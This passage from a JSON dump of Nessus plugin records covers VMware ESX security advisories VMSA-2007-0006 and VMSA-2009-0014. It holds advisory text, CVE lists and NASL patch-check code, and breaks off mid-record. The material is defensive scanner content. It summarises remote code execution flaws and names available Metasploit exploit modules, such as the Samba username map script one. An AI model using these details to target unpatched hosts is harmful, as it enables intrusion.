"CVE-2007-0063", "CVE-2007-0494", "CVE-2007-1716", "CVE-2007-1856", "CVE-2007-2442", "CVE-2007-2443", "CVE-2007-2446", "CVE-2007-2447", "CVE-2007-2798", "CVE-2007-4059", "CVE-2007-4155", "CVE-2007-4496", "CVE-2007-4497"], "modified": "2021-01-06T00:00:00", "cpe": ["cpe:/o:vmware:esx:2.0.2", "cpe:/o:vmware:esx:2.1.3", "cpe:/o:vmware:esx:2.5.3", "cpe:/o:vmware:esx:2.5.4", "cpe:/o:vmware:esx:3.0.0", "cpe:/o:vmware:esx:3.0.1", "cpe:/o:vmware:esx:3.0.2"], "id": "VMWARE_VMSA-2007-0006.NASL", "href": "https://www.tenable.com/plugins/nessus/40370", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from VMware Security Advisory 2007-0006. \n# The text itself is copyright (C) VMware Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(40370);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2004-0813\", \"CVE-2006-1174\", \"CVE-2006-3619\", \"CVE-2006-4146\", \"CVE-2006-4600\", \"CVE-2007-0061\", \"CVE-2007-0062\", \"CVE-2007-0063\", \"CVE-2007-0494\", \"CVE-2007-1716\", \"CVE-2007-1856\", \"CVE-2007-2442\", \"CVE-2007-2443\", \"CVE-2007-2446\", \"CVE-2007-2447\", \"CVE-2007-2798\", \"CVE-2007-4059\", \"CVE-2007-4155\", \"CVE-2007-4496\", \"CVE-2007-4497\");\n script_bugtraq_id(18111, 19832, 22231, 23520, 23972, 23973, 24195, 24196, 24197, 24198, 24653, 24655, 24657, 25110, 25131, 25729, 25731, 25732);\n script_xref(name:\"VMSA\", value:\"2007-0006\");\n\n script_name(english:\"VMSA-2007-0006 : Critical security updates for all supported versions of VMware ESX Server, VMware Server, VMware Workstation, VMware ACE, and VMware Player\");\n script_summary(english:\"Checks esxupdate output for the patches\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote VMware ESX host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Problems addressed by these patches :\n\nI Arbitrary code execution and denial of service vulnerabilities\n\n This release fixes a security vulnerability that could allow a\n guest operating system user with administrative privileges to cause\n memory corruption in a host process, and thus potentially execute\n arbitrary code on the host. (CVE-2007-4496)\n\n This release fixes a denial of service vulnerability that could\n allow a guest operating system to cause a host process to become\n unresponsive or exit unexpectedly. (CVE-2007-4497)\n\n Thanks to Rafal Wojtczvk of McAfee for identifying and reporting\n these issues.\n\nII Hosted products DHCP security vulnerabilities addressed\n\n This release fixes several vulnerabilities in the DHCP server\n that could enable a specially crafted packets to gain system-level\n privileges. (CVE-2007-0061, CVE-2007-0062, CVE-2007-0063)\n\n Thanks to Neel Mehta and Ryan Smith of the IBM Internet Security\n Systems X-Force for discovering and researching these\n vulnerabilities.\n\nIII Windows based hosted product vulnerability in\n IntraProcessLogging.dll and vielib.dll.\n\n This release fixes a security vulnerability that could allow a\n malicious remote user to exploit the library file\n IntraProcessLogging.dll to overwrite files in a system.\n (CVE-2007-4059)\n\n This release fixes a security vulnerability that could allow a\n malicious remote user to exploit the library file vielib.dll to\n overwrite files in a system. (CVE-2007-4155)\n\n Thanks to the Goodfellas Security Research Team for discovering and\n researching these vulnerabilities.\n\nIV Escalation of privileges on Windows hosted systems\n\n This release fixes a security vulnerability in which Workstation\n was starting registered Windows services in an insecure manner.\n This vulnerability could allow a malicious user to escalate user\n privileges.\n\n Thanks to Foundstone for discovering this vulnerability.\n\nV Potential denial of service using VMware Player\n\n This release fixes a problem that prevented VMware Player from\n launching. This problem was accompanied by the error message VMware\n Player unrecoverable error: (player) Exception 0xc0000005 (access\n violation) has occurred.\n\nVI ESX Service Console updates\n\na. Service console package Samba, has been updated to address the\n following issues :\n\n Various bugs were found in NDR parsing, used to decode MS-RPC\n requests in Samba. A remote attacker could have sent carefully\n crafted requests causing a heap overflow, which may have led to the\n ability to execute arbitrary code on the server. (CVE-2007-2446)\n\n Unescaped user input parameters were being passed as arguments to\n /bin/sh. A remote, authenticated, user could have triggered this\n flaw and executed arbitrary code on the server. Additionally, this\n flaw could be triggered by a remote unauthenticated user if Samba\n was configured to use the non-default username map script option.\n (CVE-2007-2447)\n\n Thanks to the Samba developers, TippingPoint, and iDefense for\n identifying and reporting these issues.\n\n Note: These issues only affect the service console network, and are\n not remote vulnerabilities for ESX Server hosts that have been set\n up with the security best practices provided by VMware.\n http://www.vmware.com/resources/techresources/726\n\nb. Updated bind package for the service console fixes a flaw with the\n way ISC BIND processed certain DNS query responses.\n\n ISC BIND (Berkeley Internet Name Domain) is an implementation of\n the DNS (Domain Name System) protocols. Under some circumstances, a\n malicious remote user could launch a Denial-of-Service attack on\n ESX Server hosts that had enabled DNSSEC validation.\n (CVE-2007-0494)\n\n Note: These issues only affect the service console network, and are\n not remote vulnerabilities for ESX Server hosts that have been set\n up with the security best practices provided by VMware.\n http://www.vmware.com/resources/techresources/726\n\nc. This patch provides updated service console package krb5 update.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n assigned the names CVE-2007-2442, CVE-2007-2443, and CVE-2007-2798\n to these security issues.\n\n Thanks to Wei Wang of McAfee Avert Labs discovered these\n vulnerabilities.\n\n Note: The VMware service console does not provide the kadmind\n binary, and is not affected by these issues, but a update has been\n provided for completeness.\n\nd. Service console update for vixie-cron\n\n This patch provides an updated service console package vixie-cron.\n Cron is a standard UNIX daemon that runs specified programs at\n scheduled times.\n\n A denial of service issue was found in the way vixie-cron verified\n crontab file integrity. A local user with the ability to create a\n hardlink to /etc/crontab could potentially prevent vixie-cron from\n executing certain system cron jobs. (CVE-2007-1856)\n\n Thanks to Raphael Marichez for identifying this issue.\n\ne. Service console update for shadow-utils\n\n This patch provides an updated shadow-utils package. A new\n user's mailbox, when created, could have random permissions for a\n short period. This could enable a local malicious user to\n read or modify the mailbox. (CVE-2006-1174)\n\nf. Service console update for OpenLDAP\n\n This patch provides a updated OpenLDAP package. A flaw could\n allow users with selfwrite access to modify the distinguished\n name of any user, instead of being limited to modify only\n their own distinguished name. (CVE-2006-4600)\n\ng. Service console update for PAM\n\n This patch provides an updated PAM package A vulnerability was\n found that could allow console users with access to certain device\n files to cause damage to recordable CD drives. Certain file\n permissions have now been modified to disallow access.\n (CVE-2004-0813)\n\n A flaw was found with console device permissions. It was possible\n for various console devices to retain ownership of the previoius\n console user after logging out, which could result in leakage of\n information to an unauthorized user. (CVE-2007-1716)\n\nh. Service console update for GCC\n\n This patch provides security fixes for the service console GNU\n Compiler Collection (GCC) packages that include C, C++, Java,\n Fortran 77, Objective C, and Ada 95 GNU compilers and related\n support libraries.\n\n A flaw was found in the fastjar utility that could potentially\n allow a malicious user to create a JAR file which, if unpacked\n using fastjar, could write to any file that an authorized user had\n write access to. (CVE-2006-3619)\n\n Thanks to J&uuml;rgen Weigert for identifying this issue.\n\ni. Service Console update for GDB\n\n This patch provides a security fix for the service console GNU\n debugger (GDB). Various vulnerabilities were found in GDB. These\n vulnerabilities may allow a malicious user to deceive a user into\n loading debugging information into GDB, enabling the execution of\n arbitrary code with the privileges of the user. (CVE-2006-4146)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://lists.vmware.com/pipermail/security-announce/2007/000001.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply the missing patches.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba \"username map script\" Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(119, 189, 264, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx:2.0.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx:2.1.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx:2.5.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx:2.5.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx:3.0.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx:3.0.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx:3.0.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/09/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/27\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/07/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"VMware ESX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/VMware/release\", \"Host/VMware/version\");\n script_require_ports(\"Host/VMware/esxupdate\", \"Host/VMware/esxcli_software_vibs\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"vmware_esx_packages.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/VMware/release\")) audit(AUDIT_OS_NOT, \"VMware ESX / ESXi\");\nif (\n !get_kb_item(\"Host/VMware/esxcli_software_vibs\") &&\n !get_kb_item(\"Host/VMware/esxupdate\")\n) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ninit_esx_check(date:\"2007-09-18\");\nflag = 0;\n\n\nif (esx_check(ver:\"ESX 2.0.2\", patch:\"8\")) flag++;\n\nif (esx_check(ver:\"ESX 2.1.3\", patch:\"8\")) flag++;\n\nif (esx_check(ver:\"ESX 2.5.3\", patch:\"13\")) flag++;\n\nif (esx_check(ver:\"ESX 2.5.4\", patch:\"10\")) flag++;\n\nif (esx_check(ver:\"ESX 3.0.0\", patch:\"ESX-1001204\")) flag++;\nif (esx_check(ver:\"ESX 3.0.0\", patch:\"ESX-1001205\")) flag++;\nif (esx_check(ver:\"ESX 3.0.0\", patch:\"ESX-1001206\")) flag++;\nif (esx_check(ver:\"ESX 3.0.0\", patch:\"ESX-1001207\")) flag++;\nif (esx_check(ver:\"ESX 3.0.0\", patch:\"ESX-1001208\")) flag++;\nif (esx_check(ver:\"ESX 3.0.0\", patch:\"ESX-1001209\")) flag++;\nif (esx_check(ver:\"ESX 3.0.0\", patch:\"ESX-1001210\")) flag++;\nif (esx_check(ver:\"ESX 3.0.0\", patch:\"ESX-1001211\")) flag++;\nif (esx_check(ver:\"ESX 3.0.0\", patch:\"ESX-1001212\")) flag++;\nif (esx_check(ver:\"ESX 3.0.0\", patch:\"ESX-4809553\")) flag++;\n\nif (esx_check(ver:\"ESX 3.0.1\", patch:\"ESX-1001213\")) flag++;\nif (esx_check(ver:\"ESX 3.0.1\", patch:\"ESX-1001214\")) flag++;\nif (esx_check(ver:\"ESX 3.0.1\", patch:\"ESX-1001691\")) flag++;\nif (esx_check(ver:\"ESX 3.0.1\", patch:\"ESX-1001692\")) flag++;\nif (esx_check(ver:\"ESX 3.0.1\", patch:\"ESX-1001693\")) flag++;\nif (esx_check(ver:\"ESX 3.0.1\", patch:\"ESX-1001694\")) flag++;\nif (esx_check(ver:\"ESX 3.0.1\", patch:\"ESX-1001723\")) flag++;\nif (esx_check(ver:\"ESX 3.0.1\", patch:\"ESX-8253547\")) flag++;\nif (esx_check(ver:\"ESX 3.0.1\", patch:\"ESX-8258730\")) flag++;\nif (esx_check(ver:\"ESX 3.0.1\", patch:\"ESX-8567382\")) flag++;\n\nif (esx_check(ver:\"ESX 3.0.2\", patch:\"ESX-1001725\")) flag++;\nif (esx_check(ver:\"ESX 3.0.2\", patch:\"ESX-1001726\")) flag++;\nif (esx_check(ver:\"ESX 3.0.2\", patch:\"ESX-1001727\")) flag++;\nif (esx_check(ver:\"ESX 3.0.2\", patch:\"ESX-1001728\")) flag++;\nif (esx_check(ver:\"ESX 3.0.2\", patch:\"ESX-1001729\")) flag++;\nif (esx_check(ver:\"ESX 3.0.2\", patch:\"ESX-1001730\")) flag++;\nif (esx_check(ver:\"ESX 3.0.2\", patch:\"ESX-1001731\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:esx_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:55:41", "description": "a. Service Console update for DHCP and third-party library update for DHCP client.\n\n DHCP is an Internet-standard protocol by which a computer can be connected to a local network, ask to be given configuration information, and receive from a server enough information to configure itself as a member of that network.\n\n A stack-based buffer overflow in the script_write_params method in ISC DHCP dhclient allows remote DHCP servers to execute arbitrary code via a crafted subnet-mask option.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org) has assigned the name CVE-2009-0692 to this issue.\n\n An insecure temporary file use flaw was discovered in the DHCP daemon's init script ('/etc/init.d/dhcpd'). A local attacker could use this flaw to overwrite an arbitrary file with the output of the 'dhcpd -t' command via a symbolic link attack, if a system administrator executed the DHCP init script with the 'configtest', 'restart', or 'reload' option.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org) has assigned the name CVE-2009-1893 to this issue.\n\nb. Updated Service Console package kernel\n\n Service Console package kernel update to version kernel-2.4.21-58.EL.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2008-4210, CVE-2008-3275, CVE-2008-0598, CVE-2008-2136, CVE-2008-2812, CVE-2007-6063, CVE-2008-3525 to the security issues fixed in kernel-2.4.21-58.EL\n\nc. JRE Security Update\n\n JRE update to version 1.5.0_18, which addresses multiple security issues that existed in earlier releases of JRE.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the following names to the security issues fixed in JRE 1.5.0_17: CVE-2008-2086, CVE-2008-5347, CVE-2008-5348, CVE-2008-5349, CVE-2008-5350, CVE-2008-5351, CVE-2008-5352, CVE-2008-5353, CVE-2008-5354, CVE-2008-5356, CVE-2008-5357, CVE-2008-5358, CVE-2008-5359, CVE-2008-5360, CVE-2008-5339, CVE-2008-5342, CVE-2008-5344, CVE-2008-5345, CVE-2008-5346, CVE-2008-5340, CVE-2008-5341, CVE-2008-5343, and CVE-2008-5355.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the following names to the security issues fixed in JRE 1.5.0_18: CVE-2009-1093, CVE-2009-1094, CVE-2009-1095, CVE-2009-1096, CVE-2009-1097, CVE-2009-1098, CVE-2009-1099, CVE-2009-1100, CVE-2009-1101, CVE-2009-1102, CVE-2009-1103, CVE-2009-1104, CVE-2009-1105, CVE-2009-1106, and CVE-2009-1107.", "cvss3": {}, "published": "2009-10-19T00:00:00", "type": "nessus", "title": "VMSA-2009-0014 : VMware ESX patches for DHCP, Service Console kernel, and JRE resolve multiple security issues", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-6063", "CVE-2008-0598", "CVE-2008-2086", "CVE-2008-2136", "CVE-2008-2812", "CVE-2008-3275", "CVE-2008-3525", "CVE-2008-4210", "CVE-2008-5339", "CVE-2008-5340", "CVE-2008-5341", "CVE-2008-5342", "CVE-2008-5343", "CVE-2008-5344", "CVE-2008-5345", "CVE-2008-5346", "CVE-2008-5347", "CVE-2008-5348", "CVE-2008-5349", "CVE-2008-5350", "CVE-2008-5351", "CVE-2008-5352", "CVE-2008-5353", "CVE-2008-5354", "CVE-2008-5355", "CVE-2008-5356", "CVE-2008-5357", "CVE-2008-5358", "CVE-2008-5359", "CVE-2008-5360", "CVE-2009-0692", "CVE-2009-1093", "CVE-2009-1094", "CVE-2009-1095", "CVE-2009-1096", "CVE-2009-1097", "CVE-2009-1098", "CVE-2009-1099", "CVE-2009-1100", "CVE-2009-1101", "CVE-2009-1102", "CVE-2009-1103", "CVE-2009-1104", "CVE-2009-1105", "CVE-2009-1106", "CVE-2009-1107", "CVE-2009-1893"], "modified": "2021-01-06T00:00:00", "cpe": ["cpe:/o:vmware:esx:3.0.3", "cpe:/o:vmware:esx:3.5", "cpe:/o:vmware:esx:4.0"], "id": "VMWARE_VMSA-2009-0014.NASL", "href": "https://www.tenable.com/plugins/nessus/42179", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from VMware Security Advisory 2009-0014. \n# The text itself is copyright (C) VMware Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(42179);\n script_version(\"1.34\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2007-6063\", \"CVE-2008-0598\", \"CVE-2008-2086\", \"CVE-2008-2136\", \"CVE-2008-2812\", \"CVE-2008-3275\", \"CVE-2008-3525\", \"CVE-2008-4210\", \"CVE-2008-5339\", \"CVE-2008-5340\", \"CVE-2008-5341\", \"CVE-2008-5342\", \"CVE-2008-5343\", \"CVE-2008-5344\", \"CVE-2008-5345\", \"CVE-2008-5346\", \"CVE-2008-5347\", \"CVE-2008-5348\", \"CVE-2008-5349\", \"CVE-2008-5350\", \"CVE-2008-5351\", \"CVE-2008-5352\", \"CVE-2008-5353\", \"CVE-2008-5354\", \"CVE-2008-5355\", \"CVE-2008-5356\", \"CVE-2008-5357\", \"CVE-2008-5358\", \"CVE-2008-5359\", \"CVE-2008-5360\", \"CVE-2009-0692\", \"CVE-2009-1093\", \"CVE-2009-1094\", \"CVE-2009-1095\", \"CVE-2009-1096\", \"CVE-2009-1097\", \"CVE-2009-1098\", \"CVE-2009-1099\", \"CVE-2009-1100\", \"CVE-2009-1101\", \"CVE-2009-1102\", \"CVE-2009-1103\", \"CVE-2009-1104\", \"CVE-2009-1105\", \"CVE-2009-1106\", \"CVE-2009-1107\", \"CVE-2009-1893\");\n script_bugtraq_id(35668);\n script_xref(name:\"VMSA\", value:\"2009-0014\");\n\n script_name(english:\"VMSA-2009-0014 : VMware ESX patches for DHCP, Service Console kernel, and JRE resolve multiple security issues\");\n script_summary(english:\"Checks esxupdate output for the patches\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote VMware ESX host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"a. Service Console update for DHCP and third-party library update\n for DHCP client.\n\n DHCP is an Internet-standard protocol by which a computer can be\n connected to a local network, ask to be given configuration\n information, and receive from a server enough information to\n configure itself as a member of that network.\n\n A stack-based buffer overflow in the script_write_params method in\n ISC DHCP dhclient allows remote DHCP servers to execute arbitrary\n code via a crafted subnet-mask option.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n has assigned the name CVE-2009-0692 to this issue.\n\n An insecure temporary file use flaw was discovered in the DHCP\n daemon's init script ('/etc/init.d/dhcpd'). A local attacker could\n use this flaw to overwrite an arbitrary file with the output of the\n 'dhcpd -t' command via a symbolic link attack, if a system\n administrator executed the DHCP init script with the 'configtest',\n 'restart', or 'reload' option.\n\n The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n has assigned the name CVE-2009-1893 to this issue.\n\nb. Updated Service Console package kernel\n\n Service Console package kernel update to version\n kernel-2.4.21-58.EL.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the names CVE-2008-4210, CVE-2008-3275, CVE-2008-0598,\n CVE-2008-2136, CVE-2008-2812, CVE-2007-6063, CVE-2008-3525 to the\n security issues fixed in kernel-2.4.21-58.EL\n\nc. JRE Security Update\n\n JRE update to version 1.5.0_18, which addresses multiple security\n issues that existed in earlier releases of JRE.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has\n assigned the following names to the security issues fixed in\n JRE 1.5.0_17: CVE-2008-2086, CVE-2008-5347, CVE-2008-5348,\n CVE-2008-5349, CVE-2008-5350, CVE-2008-5351, CVE-2008-5352,\n CVE-2008-5353, CVE-2008-5354, CVE-2008-5356, CVE-2008-5357,\n CVE-2008-5358, CVE-2008-5359, CVE-2008-5360, CVE-2008-5339,\n CVE-2008-5342, CVE-2008-5344, CVE-2008-5345, CVE-2008-5346,\n CVE-2008-5340, CVE-2008-5341, CVE-2008-5343, and CVE-2008-5355.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has\n assigned the following names to the security issues fixed in\n JRE 1.5.0_18: CVE-2009-1093, CVE-2009-1094, CVE-2009-1095,\n CVE-2009-1096, CVE-2009-1097, CVE-2009-1098, CVE-2009-1099,\n CVE-2009-1100, CVE-2009-1101, CVE-2009-1102, CVE-2009-1103,\n CVE-2009-1104, CVE-2009-1105, CVE-2009-1106, and CVE-2009-1107.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://lists.vmware.com/pipermail/security-announce/2010/000076.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply the missing patches.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java Calendar Deserialization Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(16, 20, 59, 94, 119, 189, 200, 264, 287, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx:3.0.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx:3.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx:4.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/11/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/10/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/10/19\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"VMware ESX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/VMware/release\", \"Host/VMware/version\");\n script_require_ports(\"Host/VMware/esxupdate\", \"Host/VMware/esxcli_software_vibs\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"vmware_esx_packages.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/VMware/release\")) audit(AUDIT_OS_NOT, \"VMware ESX / ESXi\");\nif (\n !get_kb_item(\"Host/VMware/esxcli_software_vibs\") &&\n !get_kb_item(\"Host/VMware/esxupdate\")\n) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ninit_esx_check(date:\"2009-10-16\");\nflag = 0;\n\n\nif (esx_check(ver:\"ESX 3.0.3\", patch:\"ESX303-200910402-SG\")) flag++;\n\nif (\n esx_check(\n ver : \"ESX 3.5.0\",\n patch : \"ESX350-200910401-SG\",\n patch_updates : make_list(\"ESX350-200911201-UG\", \"ESX350-Update05\", \"ESX350-Update05a\")\n )\n) flag++;\nif (\n esx_check(\n ver : \"ESX 3.5.0\",\n patch : \"ESX350-200910403-SG\",\n patch_updates : make_list(\"ESX350-201003403-SG\", \"ESX350-201203401-SG\", \"ESX350-Update05\", \"ESX350-Update05a\")\n )\n) flag++;\nif (\n esx_check(\n ver : \"ESX 3.5.0\",\n patch : \"ESX350-200910406-SG\",\n patch_updates : make_list(\"ESX350-201203405-SG\", \"ESX350-Update05\", \"ESX350-Update05a\")\n )\n) flag++;\n\nif (\n esx_check(\n ver : \"ESX 4.0\",\n patch : \"ESX400-200912404-SG\",\n patch_updates : make_list(\"ESX400-Update02\", \"ESX400-Update03\", \"ESX400-Update04\")\n )\n) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:esx_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:36:07", "description": "The remote VMware ESX / ESXi host is missing a security-related patch.\nIt is, therefore, affected by multiple vulnerabilities, including remote code execution vulnerabilities, in the following components :\n\n - ISC DHCP dhclient\n - Integrated Services Digital Network (ISDN) subsystem\n - Java Runtime Environment (JRE)\n - Java SE Development Kit (JDK)\n - Java SE Web Start\n - Linux kernel\n - Linux kernel 32-bit and 64-bit emulation\n - Linux kernel Simple Internet Transition INET6\n - Linux kernel tty\n - Linux kernel virtual file system (VFS)\n - Red Hat dhcpd init script for DHCP\n - SBNI WAN driver", "cvss3": {}, "published": "2016-03-03T00:00:00", "type": "nessus", "title": "VMware ESX / ESXi Multiple Vulnerabilities (VMSA-2009-0014) (remote check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-6063", "CVE-2008-0598", "CVE-2008-2086", "CVE-2008-2136", "CVE-2008-2812", "CVE-2008-3275", "CVE-2008-3525", "CVE-2008-4210", "CVE-2008-5339", "CVE-2008-5340", "CVE-2008-5341", "CVE-2008-5342", "CVE-2008-5343", "CVE-2008-5344", "CVE-2008-5345", "CVE-2008-5346", "CVE-2008-5347", "CVE-2008-5348", "CVE-2008-5349", "CVE-2008-5350", "CVE-2008-5351", "CVE-2008-5352", "CVE-2008-5353", "CVE-2008-5354", "CVE-2008-5355", "CVE-2008-5356", "CVE-2008-5357", "CVE-2008-5358", "CVE-2008-5359", "CVE-2008-5360", "CVE-2009-0692", "CVE-2009-1093", "CVE-2009-1094", "CVE-2009-1095", "CVE-2009-1096", "CVE-2009-1097", "CVE-2009-1098", "CVE-2009-1099", "CVE-2009-1100", "CVE-2009-1101", "CVE-2009-1102", "CVE-2009-1103", "CVE-2009-1104", "CVE-2009-1105", "CVE-2009-1106", "CVE-2009-1107", "CVE-2009-1893"], "modified": "2021-01-06T00:00:00", "cpe": ["cpe:/o:vmware:esx", "cpe:/o:vmware:esxi"], "id": "VMWARE_VMSA-2009-0014_REMOTE.NASL", "href": "https://www.tenable.com/plugins/nessus/89116", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89116);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2007-6063\",\n \"CVE-2008-0598\",\n \"CVE-2008-2086\",\n \"CVE-2008-2136\",\n \"CVE-2008-2812\",\n \"CVE-2008-3275\",\n \"CVE-2008-3525\",\n \"CVE-2008-4210\",\n \"CVE-2008-5339\",\n \"CVE-2008-5340\",\n \"CVE-2008-5341\",\n \"CVE-2008-5342\",\n \"CVE-2008-5343\",\n \"CVE-2008-5344\",\n \"CVE-2008-5345\",\n \"CVE-2008-5346\",\n \"CVE-2008-5347\",\n \"CVE-2008-5348\",\n \"CVE-2008-5349\",\n \"CVE-2008-5350\",\n \"CVE-2008-5351\",\n \"CVE-2008-5352\",\n \"CVE-2008-5353\",\n \"CVE-2008-5354\",\n \"CVE-2008-5355\",\n \"CVE-2008-5356\",\n \"CVE-2008-5357\",\n \"CVE-2008-5358\",\n \"CVE-2008-5359\",\n \"CVE-2008-5360\",\n \"CVE-2009-0692\",\n \"CVE-2009-1093\",\n \"CVE-2009-1094\",\n \"CVE-2009-1095\",\n \"CVE-2009-1096\",\n \"CVE-2009-1097\",\n \"CVE-2009-1098\",\n \"CVE-2009-1099\",\n \"CVE-2009-1100\",\n \"CVE-2009-1101\",\n \"CVE-2009-1102\",\n \"CVE-2009-1103\",\n \"CVE-2009-1104\",\n \"CVE-2009-1105\",\n \"CVE-2009-1106\",\n \"CVE-2009-1107\",\n \"CVE-2009-1893\"\n );\n script_bugtraq_id(\n 26605,\n 29235,\n 29942,\n 30076,\n 30647,\n 31368,\n 32608,\n 32620,\n 32892,\n 34240,\n 35668,\n 35670\n );\n script_xref(name:\"VMSA\", value:\"2009-0014\");\n\n script_name(english:\"VMware ESX / ESXi Multiple Vulnerabilities (VMSA-2009-0014) 